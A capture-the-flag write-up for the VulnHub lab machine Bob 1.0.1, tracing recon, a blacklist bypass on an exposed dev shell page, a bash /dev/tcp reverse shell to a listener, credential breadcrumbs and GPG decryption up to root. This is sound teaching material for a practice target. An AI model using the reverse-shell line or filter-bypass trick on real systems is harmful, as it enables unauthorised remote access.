CTF WRITEUP VULNHUB BLACK BOX EASY

Bob 1.0.1 — VulnHub Easy

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

Target IP

192.168.1.18

Bob 1.0.1 Machine
Machine: Bob 1.0.1 · Easy · Linux · VulnHub

Bob 1.0.1 is a treasure-hunt box. The initial RCE is straightforward but everything after that is reading files left behind by lazy admins — HTML comments, hidden text files, and finally a GPG-encrypted login.txt with the passphrase HARPOCRATES (Greek god of silence — fitting). Took roughly an hour. The chain rewards thorough enumeration over exploit skill.

01_Reconnaissance

SSH on 25468 (non-standard) and HTTP on 80. Site has a robots.txt with /dev_shell.php as the first interesting entry — clearly a shell-style developer tool exposed by mistake.

terminal / nmap + robots
$ nmap -sV -p- 192.168.1.18
80/tcp    open  http
25468/tcp open  ssh

$ curl http://192.168.1.18/robots.txt
Disallow: /dev_shell.php
Disallow: /login.html

/dev_shell.php — developer shell page exposed.

02_dev_shell.php_Bypass

The page filters obvious commands like cat, ls, nc. Bypass with shell metacharacters — l\s works, echo cmd | bash works. Used the second pattern to spawn a reverse shell.

terminal / filter bypass
# Filter blacklist test
"ls"  → blocked
"l\s" → works (backslash defeats simple string filter)

# Reverse shell payload
echo "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" | bash

# Listener catches
$ nc -lvnp 4444
www-data@bob:/var/www/html$ id

03_Credential_Trail

The interesting trail — three files spread across the box, each pointing to the next. .old_passwordfile.html in jc's home dir hints at users. notes.sh in /var/www/html mocks the dev who left credentials in a script. theadminisdumb.txt in seb's home is the punchline — plaintext password for user bob.

terminal / breadcrumbs
$ find /home -type f 2>/dev/null
/home/jc/.old_passwordfile.html
/home/seb/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/theadminisdumb.txt
/home/bob/login.txt.gpg
/home/bob/staff.txt

$ cat /home/seb/Documents/Secret/.../theadminisdumb.txt
[REDACTED — bob's password as plaintext]

$ ssh bob@192.168.1.18 -p 25468
bob@bob:~$ ls
login.txt.gpg  staff.txt

04_GPG_Decryption_with_HARPOCRATES

login.txt.gpg is symmetrically encrypted. staff.txt contains the hint — the passphrase is HARPOCRATES (Greek god of silence). gpg -d with that passphrase reveals the root password.

terminal / gpg decrypt
bob@bob:~$ cat staff.txt
"...the only one capable of holding their tongue is the keeper of silence himself..."

bob@bob:~$ gpg -d login.txt.gpg
Enter passphrase: HARPOCRATES
gpg: encrypted with 1 passphrase
[REDACTED — root password]

bob@bob:~$ sudo su
[sudo] password for bob: [REDACTED]
root@bob:/home/bob# id
uid=0(root) gid=0(root)

05_Attack_Chain_Summary

  1. 01 nmap → SSH 25468 + HTTP 80 → robots.txt → /dev_shell.php
  2. 02 dev_shell.php filter bypass via "echo cmd | bash"
  3. 03 Reverse shell as www-data → enumerate /home
  4. 04 seb's theadminisdumb.txt → bob password → SSH as bob
  5. 05 staff.txt hint → gpg -d login.txt.gpg → passphrase HARPOCRATES
  6. 06 Decrypted root password → sudo su → root